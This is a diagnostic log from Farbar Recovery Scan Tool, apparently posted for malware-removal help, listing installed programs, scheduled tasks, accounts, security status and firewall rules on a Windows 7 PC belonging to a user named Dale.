C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-11-06 08:52
 
==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-11-2016
Ran by Dale (12-11-2016 19:54:49)
Running from C:\Users\Dale\Desktop
Windows 7 Professional Service Pack 1 (X64) (2016-01-09 14:46:25)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-2722837513-1420934957-2528714982-500 - Administrator - Disabled)
Dale (S-1-5-21-2722837513-1420934957-2528714982-1000 - Administrator - Enabled) => C:\Users\Dale
Guest (S-1-5-21-2722837513-1420934957-2528714982-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-2722837513-1420934957-2528714982-1002 - Limited - Enabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Norton Security (Disabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security (Disabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.162 - Adobe Systems Incorporated)
AI Suite (HKLM-x32\...\{310BC5E2-31AF-49BB-904D-E71EB93645DC}) (Version: 2.00.02 - )
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.2.0 - Asmedia Technology)
ASUS WebStorage (HKLM-x32\...\ASUS WebStorage) (Version: 3.0.94.193 - eCareme Technologies, Inc.)
ASUSUpdate (HKLM-x32\...\{587178E7-B1DF-494E-9838-FA4DD36E873C}) (Version: 7.18.03 - ASUSTeK Computer Inc.)
ATI Catalyst Install Manager (HKLM\...\{2A13EF26-4D68-B2D7-A486-DBBD2FDE366B}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
BufferChm (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
C310 (x32 Version: 140.0.304.000 - Hewlett-Packard) Hidden
ccc-core-static (x32 Version: 2010.0210.2206.39615 - ATI) Hidden
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
Destinations (x32 Version: 140.0.77.000 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
EPU-4 Engine (HKLM-x32\...\{8F66047B-1AF3-40D9-80D7-106E2EDC2C2A}) (Version: 1.03.03 - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.21.57 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
GoToMeeting 7.26.0.5808 (HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\GoToMeeting) (Version: 7.26.0.5808 - CitrixOnline)
GPBaseService2 (x32 Version: 140.0.211.000 - Hewlett-Packard) Hidden
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.2024 - HP Photo Creations Powered by RocketLife)
HP Photosmart Prem C310 All-In-One Driver Software 14.0 Rel. 7 (HKLM\...\{4E484899-4F93-4086-88BA-56BDDF47A776}) (Version: 14.0 - HP)
HP Smart Web Printing 4.60 (HKLM\...\HP Smart Web Printing) (Version: 4.60 - HP)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HP Support Assistant (HKLM-x32\...\{56D27851-B9A6-430F-875A-E2D7A3802C7B}) (Version: 8.3.34.7 - HP Inc.)
HP Support Solutions Framework (HKLM-x32\...\{2B5A1E68-6617-406D-B797-5DAB5B4630B8}) (Version: 12.5.32.37 - HP Inc.)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPAppStudio (x32 Version: 140.0.95.000 - Hewlett-Packard) Hidden
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
HPSSupply (x32 Version: 140.0.211.000 - Hewlett-Packard) Hidden
iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics)
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
MarketResearch (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 15.0.4815.1002 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Network64 (Version: 140.0.215.000 - Hewlett-Packard) Hidden
Norton Security (HKLM-x32\...\NS) (Version: 22.8.0.50 - Symantec Corporation)
Norton Utilities 16 (HKLM-x32\...\Norton Utilities 16_is1) (Version: 16.0 - Symantec Corporation)
Office 15 Click-to-Run Extensibility Component (Version: 15.0.4815.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4815.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (Version: 15.0.4815.1002 - Microsoft Corporation) Hidden
PC Probe II (HKLM-x32\...\{F7338FA3-DAB5-49B2-900D-0AFB5760C166}) (Version: 1.04.92 - ASUSTeK Computer Inc.)
Platform (x32 Version: 1.39 - VIA Technologies, Inc.) Hidden
PS_AIO_07_C310_SW_Min (x32 Version: 140.0.304.000 - Hewlett-Packard) Hidden
Pulse Secure Host Checker (HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\PulseSecure_Host_Checker) (Version: 8.1.6.39491 - Pulse Secure, LLC)
Pulse Secure Network Connect 8.1 (HKLM-x32\...\Pulse Secure Network Connect 8.1) (Version: 8.1.6.39491 - Pulse Secure, LLC)
Pulse Secure Setup Client (HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\Juniper_Setup_Client) (Version: 8.1.6.61491 - Pulse Secure, LLC)
Pulse Secure Setup Client 64-bit Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Pulse Secure, LLC)
Pulse Secure Setup Client Activex Control (HKLM-x32\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Pulse Secure, LLC)
Pulse Secure Terminal Services Client (HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\Juniper_Term_Services) (Version: 8.1.6.39491 - Pulse Secure, LLC)
Quicken 2015 (HKLM-x32\...\{00C2D443-43D9-4550-ABEA-318288E23E57}) (Version: 24.1.11.1 - Intuit)
QuickTransfer (x32 Version: 140.0.98.000 - Hewlett-Packard) Hidden
RAIDXpert (HKLM-x32\...\InstallShield_{8B76B8E9-F773-4B75-A08C-120079EB765E}) (Version: 3.2.1540.10 - AMD)
RAIDXpert (x32 Version: 3.2.1540.10 - AMD) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.52.203.2012 - Realtek)
Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 1.00.0000 - Realtek)
Scan (x32 Version: 140.0.80.000 - Hewlett-Packard) Hidden
ScottradeELITE v5 (HKLM-x32\...\{7E94DCE4-F1F3-47AF-A2D4-8A81008D9B1F}) (Version: 5.3.0.0 - Scottrade Inc.)
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP)
Silhouette Studio (HKLM-x32\...\{27786390-C9DC-4C31-8F1A-4EFD9C833BC9}) (Version: 3.8.064 - Silhouette America)
SmartWebPrinting (x32 Version: 140.0.186.000 - Hewlett-Packard) Hidden
Soda PDF Desktop (HKLM-x32\...\SodaDesktop) (Version: 9.0.7.29594 - LULU Software Limited)
Soda PDF Desktop Asian Fonts Pack (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Convert Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Create Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Edit Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Forms Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Insert Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop OCR Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Review Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop Secure Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
Soda PDF Desktop View Module (Version: 9.0.24.30332 - LULU Software Limited) Hidden
SolutionCenter (x32 Version: 140.0.214.000 - Hewlett-Packard) Hidden
Status (x32 Version: 140.0.256.000 - Hewlett-Packard) Hidden
Toolbox (x32 Version: 140.0.428.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
Turbo Key (HKLM-x32\...\{B83F7FA5-3191-4E39-A1F2-8A9038BD0B04}) (Version: 1.01.03 - )
TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc)
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.39 - VIA Technologies, Inc.)
WebReg (x32 Version: 140.0.212.017 - Hewlett-Packard) Hidden
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2722837513-1420934957-2528714982-1000_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Dale\AppData\Local\Citrix\GoToMeeting\5102\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0A8ABF0E-E42C-4A0A-962A-9EA42D0D0A0D} - System32\Tasks\ASUS\Cpu Level Up Hook Lanunch => C:\Program Files\ASUS\Ai Suite\CpuLevelUpHookLaunch.exe [2009-12-28] ()
Task: {0D778694-01BF-4CB5-957F-2B9D3454B67F} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {2CF7C28B-3712-4625-9DD7-5CA676144E8F} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {2D7DE540-11EB-46A2-82BB-03C33C6D95A4} - System32\Tasks\Norton Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\SymErr.exe [2016-09-23] (Symantec Corporation)
Task: {2DC7CF09-A6E9-4BF9-A1EB-B78568EA4F05} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-08-23] (HP Inc.)
Task: {361D8EA9-FCB7-41F0-94DF-9ED53E391D8E} - System32\Tasks\NUSchedule => C:\Program Files (x86)\Symantec\Norton Utilities 16\nu.exe [2016-01-24] (Symantec)
Task: {36BA63EB-56D1-4110-9D12-63F49934E266} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security\Upgrade.exe [2016-09-23] (Symantec Corporation)
Task: {3D542F19-0046-496E-9253-C65238E285FA} - System32\Tasks\NUAutoUpdate => C:\Program Files (x86)\Symantec\Norton Utilities 16\SULauncher.exe [2016-01-24] (Symantec)
Task: {4314D44A-9BE6-4BA1-8A2C-E49854D01397} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-07-04] (HP Inc.)
Task: {4FDE0F52-8FB9-4FEE-8A9D-27C8ED6CB82C} - System32\Tasks\GoogleUpdateTaskMachineCore1d1e916bc7e32e3 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-22] (Google Inc.)
Task: {542BBF22-4CCC-45E0-9F13-72D5CC6F8545} - System32\Tasks\ASUS\ASUS RegRun Loader => C:\ProgramData\ASUS\AASP\1.02.00\AsLoader.exe [2010-01-13] (ASUSTeK Computer Inc.)
Task: {5D077E02-9C97-43EC-819A-06407E5CA12E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-22] (Google Inc.)
Task: {7164736C-C125-4F9F-9359-85360B9F6451} - System32\Tasks\GoogleUpdateTaskMachineUA1d1e916bd037ff2 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-22] (Google Inc.)
Task: {7E664410-0BA7-4734-8CB0-1DC19EF18AC0} - System32\Tasks\Games\UpdateCheck_S-1-5-21-2722837513-1420934957-2528714982-1000
Task: {8D46F707-D87A-4830-98D3-F02EE1268E92} - System32\Tasks\G2MUpdateTask-S-1-5-21-2722837513-1420934957-2528714982-1000 => C:\Users\Dale\AppData\Local\Citrix\GoToMeeting\5808\g2mupdate.exe [2016-11-01] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {95EED91D-3005-44BC-894C-5E5417D3F325} - System32\Tasks\Norton Security\Norton Error Processor => C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\SymErr.exe [2016-09-23] (Symantec Corporation)
Task: {998CDE86-63FB-49DC-B4B1-85B8A4C06407} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\WSCStub.exe [2016-09-23] (Symantec Corporation)
Task: {9B27BD5D-408F-40E5-8086-D465A8BF28BD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-08-03] (HP Inc.)
Task: {A6C222F7-59DE-473B-8653-21BE31C82342} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-22] (Google Inc.)
Task: {ABCB583D-6D26-4C50-86F4-F42969578D1F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-08-23] (HP Inc.)
Task: {B95977B7-556A-4DA7-8C17-15E62B9ABF92} - System32\Tasks\G2MUploadTask-S-1-5-21-2722837513-1420934957-2528714982-1000 => C:\Users\Dale\AppData\Local\Citrix\GoToMeeting\5808\g2mupload.exe [2016-11-01] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {B996CB78-9FF5-4EBF-9A46-EE6618B9EACE} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-10-12] (HP Inc.)
Task: {CCF8BA5C-781A-4C01-B2A5-DDC43FE33697} - System32\Tasks\ASUS\ASUS Update Checker => C:\Program Files (x86)\ASUS\ASUSUpdate\UpdateChecker\UpdateChecker.exe [2009-12-28] (ASUSTeK Computer Inc.)
Task: {CE47B63F-F75A-44CC-9F2E-2A7B288F1218} - System32\Tasks\HPCeeScheduleForDale => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-05-12] (HP Development Company, L.P.)
Task: {D6A998B1-BFA6-4F98-AA41-BACD70A20181} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-09-18] (Adobe Systems Incorporated)
Task: {D6F0E5CE-193B-43A8-84A7-914A643873C2} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-08-18] (HP Inc.)
Task: {E1E98814-717E-41EC-83F7-10F7AA59CED3} - System32\Tasks\ASUS\ASUS SIX Engine => C:\Program Files (x86)\ASUS\EPU-4 Engine\FourEngine.exe [2012-01-03] (ASUSTek Computer Inc.)
Task: {EEED5911-B058-4303-884F-C7F3FC4439E0} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2016-01-17] (Microsoft Corporation)
Task: {FAF047D5-15AD-4C73-BA60-FB1CAA91CADA} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2016-01-17] (Microsoft Corporation)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2722837513-1420934957-2528714982-1000.job => C:\Users\Dale\AppData\Local\Citrix\GoToMeeting\5808\g2mupdate.exe
Task: C:\Windows\Tasks\G2MUploadTask-S-1-5-21-2722837513-1420934957-2528714982-1000.job => C:\Users\Dale\AppData\Local\Citrix\GoToMeeting\5808\g2mupload.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d1e916bc7e32e3.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d1e916bd037ff2.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForDale.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\NUAutoUpdate.job => C:\Program Files (x86)\Symantec\Norton Utilities 16\SULauncher.exe
Task: C:\Windows\Tasks\NUSchedule.job => C:\Program Files (x86)\Symantec\Norton Utilities 16\nu.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2016-01-17 17:24 - 2015-10-13 04:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2016-01-17 17:25 - 2016-01-17 17:37 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\Office15\1033\GrooveIntlResource.dll
2016-01-17 17:37 - 2016-01-17 17:37 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2016-11-01 16:32 - 2016-10-30 23:29 - 01819240 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.87\libglesv2.dll
2016-11-01 16:32 - 2016-10-30 23:29 - 00093288 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.87\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 20:34 - 2016-11-12 18:39 - 00000035 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Dale\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AMD External Events Utility => 2
MSCONFIG\Services: AMD_RAIDXpert => 2
MSCONFIG\Services: AsSysCtrlService => 2
MSCONFIG\Services: DiskDoctorService => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: HPSupportSolutionsFrameworkService => 2
MSCONFIG\Services: IntuitUpdateServiceV4 => 2
MSCONFIG\Services: NU16StartManagerSvc => 2
MSCONFIG\Services: SpeedDiskService => 3
MSCONFIG\Services: VIAKaraokeService => 2
MSCONFIG\startupfolder: C:^Users^Dale^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^d159507.lnk => C:\Windows\pss\d159507.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Dale^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^e84c097.lnk => C:\Windows\pss\e84c097.lnk.Startup
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{93BFFD82-9955-4F06-B1A7-8935942D3A7E}] => (Allow) C:\Users\Dale\AppData\Local\Temp\7zS7CB1\setup\hpznui40.exe
FirewallRules: [{AE082788-E606-4815-B2A1-6E4943400245}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{A32A69C5-5173-4FB1-BBD2-21CFC40726A3}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{F6A779F8-3F2D-471D-9DDE-71E0F3A790DF}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{8BB6927D-5C26-4E06-A43F-8C0B3C6482EE}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{04512FAC-55BD-4FB8-9572-461364226DF7}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{A3C44D59-8E17-47FF-A075-F32724B32101}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{9743D652-77AE-4E89-AF2C-A7F882B45222}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{6959B2BC-2789-45E0-BBE0-D4C5C95698CF}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{3639F8D0-B5BD-4A9A-8F9A-3E332F15BD0D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{4BB40614-98EF-4A3B-8781-0EDFA72186B1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{CEF1670D-AFC8-41F0-81AA-D4F957EE1506}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{F527E2F8-F637-4001-ADF2-C8E0369275D6}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{17E3693C-AA60-462B-89F6-379D277535D8}] => (Allow) C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe
FirewallRules: [{11328349-5016-4752-BB47-B42252BEFD8B}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{81BCDCEA-207E-4599-92E1-20621624DFB1}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{4B3615B3-308C-4046-BA12-E410F7C97CEE}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{D1EA94DC-0EB7-4CE0-8493-435C863197B9}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{471F1CAD-E700-40DB-B9C9-66404FE6DDC2}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{EEA7B41B-0E0C-4DCA-8344-F848EB7B982B}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{924BD75E-30E3-45F9-9D10-A8371971E210}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{B92101A7-AF6D-4E8C-B3FF-DE51E65BFD57}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{3143D345-6826-4F2B-9F82-BCB7D4E00604}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
